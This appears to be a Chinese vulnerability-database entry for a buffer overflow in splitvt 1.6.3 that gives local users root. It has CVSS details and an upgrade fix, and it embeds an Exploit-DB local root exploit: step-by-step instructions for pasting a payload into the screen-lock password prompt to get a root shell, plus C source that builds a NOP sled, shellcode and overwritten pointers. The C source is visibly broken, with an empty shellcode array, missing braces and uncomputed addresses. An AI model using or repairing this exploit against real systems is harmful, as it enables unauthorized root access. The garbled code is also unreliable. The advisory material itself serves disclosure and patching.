发布时间 :2000-06-01 00:00:00
修订时间 :2008-09-10 15:04:44

[原文]Buffer overflow in Linux splitvt 1.6.3 and earlier allows local users to gain root privileges via a long password in the screen locking function.

[CNNVD]splitvt 1.6.3缓冲区溢出漏洞(CNNVD-200006-002)

        Linux splitvt 1.6.3和更早的版本存在缓冲区溢出漏洞。本地用户借助屏幕锁定功能的超长密码可以提升根特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  BUGTRAQ  20000614 Splitvt exploit
(UNKNOWN)  BID  1346

- 漏洞信息

splitvt 1.6.3缓冲区溢出漏洞
高危 缓冲区溢出
2000-06-01 00:00:00 2005-05-02 00:00:00
        Linux splitvt 1.6.3和更早的版本存在缓冲区溢出漏洞。本地用户借助屏幕锁定功能的超长密码可以提升根特权。

- 公告与补丁

        Upgrade to 1.6.4 of splitvt. Debian users can obtain upgrades from

- 漏洞信息 (20013)

Sam Lantinga splitvt 1.6.3 Buffer Overflow Vulnerability (EDBID:20013)
linux local
2000-06-01 Verified
0 Syzop
N/A [点击下载]

A buffer overflow condition that could be exploited to obtain root exists in splitvt 1.6.3 and earlier. Splitvt is distributed with several Linux distributions. 

	Local exploit for Debian splitvt 1.6.3-4 - by Syzop
	Thanks to aleph1 for writing the article about
	buffer overflows in phrack 49 :).

	Greetz:	Terror, Scorpion, ^Stealth^, Jornx, Multani,
		and all other ppl of The^Alliance :)

How to use the exploit

1.	Use: ./splitexp >expcode to put the exploitcode into 'expcode'.
2.	Start splitvt
3.	Enter something like 'sleep 60; echo lalala'
4.	Ctrl+O, x, 'Enter password' bla
5.	Then splitvt says 'Re-enter password', this is the moment
	you have to follow the instructions in 'expcode' to paste
	the exploitcode to splitvt (don't press enter, see 6).
6.	Wait until the sleep is done (or kill 'sleep' yourself from
	_another_ terminal).
7.	You now got a rootshell,
	type 'reset' to get a normal terminal :).


NOTE 1:	You have to paste the data exactly, so just a paste with the mouse
	won't work since the shellcode also contains 08's (backspaces),
	So using mouse copy&paste in normal linux console mode doesn't work,
	I used windows with 'putty'

NOTE 2: If you ftp the exploit code to a windows box, be sure to transfer
	the file in ASCII mode :).


#include <stdlib.h>
#include <stdio.h>

#define NOP		0x90

	The shellcode: setuid(0); execve("/bin/sh",NULL); exit(0);.
	Pointer to /bin/sh is static, so filled with 0x90s here,
	will be changed to an address at runtime.
char shellcode[] =

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  char *pointerz;
  long *addr_ptr, addr;
  int i;

  long addr1=0x80592e4;		// pointer to the middle of our window-struct
  long addr2;			// pointer to position after 25% of the NOPs
  long addr3;			// pointer to '/bin/sh' string
  fprintf(stderr,"Splitvt exploit by Syzop\n\n");
  if (argc > 1) addr1  = atol(argv[1]);


  if (!(buff = malloc(1500))) {
    printf("Can't allocate memory.\n");

  // set offset-to-/bin/sh in shellcode
  ptr = shellcode+10;
  addr_ptr = (long *) ptr;
    *(addr_ptr++) = addr3;

  // 0-300: the window struct
  // first filling with 0x40's
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < 300; i+=4)
    *(addr_ptr++) = 0x40404040;
  // set pointer to addr2 in curwin->process_char
  ptr = buff + 28;
  addr_ptr = (long *) ptr;
    *(addr_ptr++) = addr2;	// this is the pointer to addr2
  for (i = 300; i < 528; i++)		// 300-END	NOPs
    buff[i] = NOP;

  // 400-...:	shellcode
  ptr = buff + 400;
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[528] = '\0';

  // Create the pointers-to-addr1-string.
  pointerz=(char *)malloc(1004);
  ptr = pointerz;
  addr_ptr = (long *) ptr;
  for (i = 0; i < 1000; i+=4)		// 0-300:	the window-structure
    *(addr_ptr++) = addr1;

  printf("Paste this 1x:\n%s\n\nAnd this 12x:\n%s\n", buff, pointerz);

- 漏洞信息

Linux splitvt Screen Lock Function Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-06-14 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.6.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete